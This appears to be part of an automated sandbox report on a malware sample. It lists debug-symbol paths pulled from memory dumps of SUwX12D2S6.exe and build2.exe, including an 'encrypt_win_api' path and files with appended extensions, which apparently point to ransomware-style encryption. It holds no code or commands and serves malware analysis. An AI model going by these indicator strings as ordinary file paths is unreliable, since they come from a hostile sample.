Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\cM source: SUwX12D2S6.exe, 00000004.00000003.2202710386.000000000382E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\SystemAppData\Q source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110380294.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2202710386.000000000382E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ion source: SUwX12D2S6.exe, 00000004.00000003.2201021660.000000000356D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203390038.000000000357A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202256063.000000000356D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2210964209.000000000357E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2209889977.0000000003576000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2208481995.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: SUwX12D2S6.exe, 00000004.00000003.2225038196.0000000003192000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216776414.000000000318D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216475290.0000000003183000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Appli source: SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\3c source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2158347421.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174316337.000000000359D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169782007.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159372299.0000000003596000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Z source: SUwX12D2S6.exe, 00000004.00000003.2210867698.0000000003743000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218755081.000000000374A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217347390.000000000374A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\8bbwe\App source: SUwX12D2S6.exe, 00000004.00000003.2237119019.0000000003514000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2239471258.00000000034EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2202322208.0000000003189000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211528266.000000000318D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211213412.000000000318A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2201372327.0000000003184000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203425081.0000000003191000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: SUwX12D2S6.exe, 00000004.00000003.2135736768.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: SUwX12D2S6.exe, 00000004.00000003.2157081568.0000000003462000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156718696.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157423104.0000000003476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbN source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2183331491.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.000000000376B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\S5 source: SUwX12D2S6.exe, 00000004.00000003.2232069068.0000000003579000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2184874668.0000000003416000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184048113.0000000003413000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*YW: source: SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorzq source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2174356824.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2183331491.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2185146314.00000000037A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\-a source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ta\\\(* source: SUwX12D2S6.exe, 00000004.00000003.2232069068.0000000003579000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqgn source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\che\C source: SUwX12D2S6.exe, 00000004.00000003.2208481995.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\: source: SUwX12D2S6.exe, 00000004.00000003.2158968195.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156658910.00000000033B6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169889587.00000000033C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2210867698.0000000003743000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218755081.000000000374A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217347390.000000000374A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\15 source: SUwX12D2S6.exe, 00000004.00000003.2209514089.000000000380B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208818329.00000000037CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000002.1785156949.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000000.1781524100.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1783808645.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\=V source: SUwX12D2S6.exe, 00000004.00000003.2174162610.00000000033B1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\;Sy4N source: SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\cl source: SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2158347421.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174316337.000000000359D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169782007.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159372299.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbhe.txt.bgzqxt source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110380294.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\y source: SUwX12D2S6.exe, 00000004.00000003.2236436289.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2183331491.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2185146314.00000000037A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorONTENT_TASKBARHEADLINES.jsontxt source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110380294.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\*Bi source: SUwX12D2S6.exe, 00000004.00000003.2226723722.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184121684.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225540969.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2201804626.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2170520541.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2246470832.00000000033D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\\b. source: SUwX12D2S6.exe, 00000004.00000003.2231998014.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233139919.000000000387B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2232892838.000000000386A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2231998014.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233139919.000000000387B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2232892838.000000000386A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: SUwX12D2S6.exe, SUwX12D2S6.exe, 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\m source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2158347421.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159372299.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\dat.bgzb8 source: SUwX12D2S6.exe, 00000004.00000003.2209514089.000000000380B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208818329.00000000037CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: SUwX12D2S6.exe, 00000004.00000003.2135736768.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
